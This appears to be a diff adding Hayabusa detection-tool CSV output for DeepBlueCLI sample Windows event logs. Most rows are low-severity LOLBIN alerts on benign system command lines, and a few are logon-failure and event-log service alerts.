+2016-09-15 23:50:16.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x820 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-15 23:50:16.427 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-15 23:50:25.279 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x56c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-16 00:01:09.025 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x628 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-16 00:01:09.291 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xda4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-16 05:09:57.316 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-16 05:09:57.628 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x110 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-16 05:28:03.628 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe64 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-16 05:28:03.894 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x744 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:53:42.990 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x9b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:53:44.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc64 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:53:44.490 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xab8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:53:53.459 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x268 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:56:17.454 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xb10 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:56:31.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-18 07:56:46.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-18 07:56:46.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-18 07:56:47.806 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:56:48.165 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:57:01.618 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x990 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:57:01.696 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0x9f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:57:03.862 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xb8c | User: IEUser | LID: 0x671c2",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:57:04.729 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xbf0 | User: IEUser | LID: 0x671c2,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:57:05.547 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 08:05:28.818 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 08:05:29.021 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-19 23:56:52.614 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0xb00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-19 23:56:53.723 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x988 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-19 23:56:53.973 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x22c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-19 23:56:55.848 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x810 | User: IEUser | LID: 0x671f0",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-19 23:57:03.208 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x978 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-19 23:57:32.774 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-19 23:57:36.030 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x4a8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:09:39.097 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x944 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:09:42.379 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1ac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:10:22.816 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:10:26.441 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:12:04.478 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0x14c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:12:15.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 00:13:03.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 00:13:04.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-20 00:13:05.430 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\poweron-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x678 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:13:05.758 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x790 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:13:06.461 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x454 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:13:14.758 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x974 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:13:14.868 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0x9d4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:13:18.164 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xb8c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:13:18.465 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xbe0 | User: IEUser | LID: 0x6590f,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:13:20.357 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:13:40.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:13:40.474 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe94 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:14:08.521 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf74 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:14:09.193 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf98 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:15:06.588 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:15:06.635 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc3c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:21:37.109 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:21:40.687 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:26:11.578 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb34 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:26:16.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -responsepester | Path: C:\Windows\System32\rundll32.exe | PID: 0x6a0 | User: IEUser | LID: 0x6593d",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:26:42.937 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x37c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:45:37.636 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xe8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 01:36:17.350 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x508 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,info,,Logon Failure - User Does Not Exist,User: JcDfcZTc | Type: 3 | Computer: 6hgtmVlrrFuWtO65 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
